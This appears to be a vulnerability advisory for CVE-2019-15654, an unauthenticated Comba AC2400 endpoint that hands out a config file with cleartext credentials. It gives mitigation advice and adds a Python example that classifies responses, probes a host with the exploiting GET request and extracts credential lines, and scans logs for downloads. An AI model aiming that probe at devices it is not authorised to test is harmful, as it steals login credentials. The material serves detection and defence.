PT-2020-9752 · Comba · Comba Ac2400
Published
2020-03-19
·
Updated
2023-02-03
·
CVE-2019-15654
CVSS v2.0
5.0
Medium
| Vector | AV:N/AC:L/Au:N/C:P/I:N/A:N |
Name of the Vulnerable Software and Affected Versions
Comba AC2400 devices (affected versions not specified)
Description
The device discloses its login credentials to an unauthenticated attacker. A crafted request to the "/09/business/upgrade/upcfgAction.php?download=true" endpoint requires no authentication and returns the device's DBconfig.cfg file, which stores login information in cleartext at the end of the file. Anyone who can reach the device's web interface over the network can therefore obtain valid credentials with a single GET request, which is why the vector is AV:N/Au:N with a confidentiality impact only.
Recommendations
For Comba AC2400 devices, as a temporary workaround, restrict network access to the "/09/business/upgrade/upcfgAction.php" endpoint (and ideally to the whole management web interface) until a patch is available, for example with a firewall rule, a management VLAN, or a reverse proxy in front of the device that denies the path to anything but administrator addresses; do not expose the interface to untrusted networks. Because DBconfig.cfg may already have been retrieved, treat the stored credentials as compromised and change them, together with any other system where the same password is reused. At the moment, there is no information about a newer version that contains a fix for this vulnerability.
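The checks described above, as an added example that is not part of the original advisory and not Comba's code: a classifier that decides whether a response from the upcfgAction.php endpoint is a leaked DBconfig.cfg with credentials (to confirm a device is affected before and after applying the workaround), a live probe built on it, and a scan of front-proxy or web-server access logs for unauthenticated downloads of the file. The real layout of DBconfig.cfg is not published; the "key=value" credential lines, the key names, the sample response and the sample log lines are all constructed assumptions for illustration.

```python
"""Added example for CVE-2019-15654 (not from the advisory or any Comba code).

1. classify_response(): is this reply a leaked DBconfig.cfg with credentials?
2. probe(): issue the unauthenticated request against a device you are
   authorised to test (needs network access; not exercised offline).
3. find_download_attempts(): scan common/combined-format access logs for
   hits on the endpoint from outside the administrator address list.

Assumption: credentials in DBconfig.cfg look like key=value lines near the
end of the file; the key names below are guesses, not the real format.
"""
import re
import urllib.error
import urllib.request

VULN_PATH = "/09/business/upgrade/upcfgAction.php"
VULN_QUERY = "download=true"

# Assumed credential keys: (admin_)user / username / pass / passwd / password.
CRED_KEY_RE = re.compile(
    r"^\s*(?:admin_?)?(user(?:name)?|pass(?:word|wd)?)\s*[=:]\s*(.*?)\s*$", re.I
)


def extract_credentials(body: str, tail_lines: int = 20) -> dict:
    """Credential-looking key/value pairs in the last `tail_lines` lines
    (the advisory says the login data sits at the end of DBconfig.cfg)."""
    found = {}
    for line in body.splitlines()[-tail_lines:]:
        m = CRED_KEY_RE.match(line)
        if m:
            found[m.group(1).lower()] = m.group(2)
    return found


def classify_response(status: int, headers: dict, body: str) -> str:
    """Classify a reply to GET VULN_PATH?VULN_QUERY.
    'vulnerable' - served without auth and carries a password
    'leak'       - served without auth, no recognisable credentials
    'protected'  - authentication demanded or endpoint absent
    'unknown'    - anything else"""
    if status in (401, 403, 404):
        return "protected"
    if status != 200:
        return "unknown"
    disp = {k.lower(): v for k, v in headers.items()}.get("content-disposition", "")
    creds = extract_credentials(body)
    if any(k.startswith("pass") for k in creds):
        return "vulnerable"
    if "dbconfig" in disp.lower():
        return "leak"
    return "unknown"


def probe(host: str, timeout: float = 5.0, scheme: str = "http") -> str:
    """Send the unauthenticated download request and classify the answer."""
    url = f"{scheme}://{host}{VULN_PATH}?{VULN_QUERY}"
    req = urllib.request.Request(url, headers={"User-Agent": "cve-2019-15654-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read(65536).decode("utf-8", "replace")
            return classify_response(resp.status, dict(resp.headers), body)
    except urllib.error.HTTPError as e:  # 401/403/404 etc. arrive here
        return classify_response(e.code, dict(e.headers), "")


# Common/combined log format as written by nginx or Apache in front of the device.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r"(?P<status>\d{3}) (?P<size>\S+)"
)


def find_download_attempts(log_lines, allowed_ips=()):
    """(ip, timestamp, status) for requests that hit VULN_PATH with
    download=true from an address outside `allowed_ips`.
    A 200 means the config file was handed out to that client."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        if path != VULN_PATH or VULN_QUERY not in query.split("&"):
            continue
        if m.group("ip") in allowed_ips:
            continue
        hits.append((m.group("ip"), m.group("ts"), int(m.group("status"))))
    return hits


# Constructed sample data (not real device output or real logs).
SAMPLE_HEADERS = {"Content-Type": "application/octet-stream",
                  "Content-Disposition": 'attachment; filename="DBconfig.cfg"'}
SAMPLE_BODY = "\n".join([
    "# constructed stand-in for DBconfig.cfg",
    "lan_ip=192.168.0.1", "wan_mode=dhcp", "ssid=comba-test",
    "admin_user=admin", "admin_password=Sup3rSecret",
])
SAMPLE_LOG = [
    '203.0.113.7 - - [19/Mar/2020:10:01:02 +0000] "GET /09/business/upgrade/upcfgAction.php?download=true HTTP/1.1" 200 4096 "-" "curl/7.64"',
    '10.0.0.5 - - [19/Mar/2020:10:02:00 +0000] "GET /09/business/upgrade/upcfgAction.php?download=true HTTP/1.1" 200 4096 "-" "Mozilla"',
    '203.0.113.9 - - [19/Mar/2020:10:03:00 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla"',
]

if __name__ == "__main__":
    print(classify_response(200, SAMPLE_HEADERS, SAMPLE_BODY))
    print(find_download_attempts(SAMPLE_LOG, allowed_ips={"10.0.0.5"}))
```

Run `probe("192.0.2.10")` only against a device you are authorised to test; a result of "protected" after the firewall or proxy rule is in place confirms the workaround took effect, while any 200 hit returned by `find_download_attempts` from an unexpected address means the credentials in that file should be considered exposed.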
Exploit
Missing Authentication
Weakness Enumeration
Related Identifiers
Affected Products
Comba Ac2400